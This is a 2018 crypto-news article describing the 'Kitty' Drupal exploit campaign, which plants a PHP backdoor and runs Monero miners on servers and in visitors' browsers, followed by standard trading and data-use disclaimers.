Monero’s CryptoKitty: A Malware Delivery Server
Cryptovest
Published May 24, 2018 04:00PM ET
Updated May 24, 2018 04:30PM ET
Monero’s CryptoKitty: A Malware Delivery Server
Hackers’ fascination with Monero doesn’t appear to be slowing down. As servers barely begin to recover from the onslaught of exploits that mined Monero using their processors, another remote code execution vulnerability is attacking systems running Drupal.
The researchers at Help Net Security that discovered it gave it the moniker “Kitty” due to the fact that the malware is delivered from a folder with this name. Don’t let the cute name fool you: This exploit injects code into the server that would continue to work even if the administrator removes Drupal from it.
“Once the Kitty bash script is executed, a PHP file named kdrupal.php is written to the infected server disc. In doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,” the company wrote in its report .
The script first authenticates the attacker, making sure no one else can access its functions. Then, it registers a scheduled service that repeatedly downloads and executes a script to ensure that the server remains infected.
“Once the attacker gets a persistent hold of the server, a mining program ‘kkworker,’ which is the well-known XMRig Monero miner, is installed and starts the mining process,” the company added.
Kitty isn’t done yet, though.
It might have control of a powerful server to do its bidding, but Kitty is a greedy creature. The attack also involves a mining script, labeled “me0w.js,” which injects itself into every JavaScript file on the server imaginable.
Inside the script, we also can see code that uses visitors’ CPUs to mine Monero to the hacker’s wallet.
Further in the code, we can also find a statement from the hacker that reads, “don’t delete pls i am a harmless cute little kitty.”
Help Net Security responded to this finding with, “Good thing we’re dog people.”
It bears mentioning that this particular exploit is a variant on the “Drupalgeddon 2.0” series of attacks, in which over 300 servers running Drupal—including sites like the San Diego Zoo and the government of Chihuahua, Mexico—were forced to mine Monero for a hacker.
This article appeared first on Cryptovest
Get The News You Want
Written By: Cryptovest
Trading in financial instruments and/or cryptocurrencies involves high risks including the risk of losing some, or all, of your investment amount, and may not be suitable for all investors. Prices of cryptocurrencies are extremely volatile and may be affected by external factors such as financial, regulatory or political events. Trading on margin increases the financial risks.
Before deciding to trade in financial instrument or cryptocurrencies you should be fully informed of the risks and costs associated with trading the financial markets, carefully consider your investment objectives, level of experience, and risk appetite, and seek professional advice where needed.
Fusion Media would like to remind you that the data contained in this website is not necessarily real-time nor accurate. The data and prices on the website are not necessarily provided by any market or exchange, but may be provided by market makers, and so prices may not be accurate and may differ from the actual price at any given market, meaning prices are indicative and not appropriate for trading purposes. Fusion Media and any provider of the data contained in this website will not accept liability for any loss or damage as a result of your trading, or your reliance on the information contained within this website.
It is prohibited to use, store, reproduce, display, modify, transmit or distribute the data contained in this website without the explicit prior written permission of Fusion Media and/or the data provider. All intellectual property rights are reserved by the providers and/or the exchange providing the data contained in this website.
Fusion Media may be compensated by the advertisers that appear on the website, based on your interaction with the advertisements or advertisers.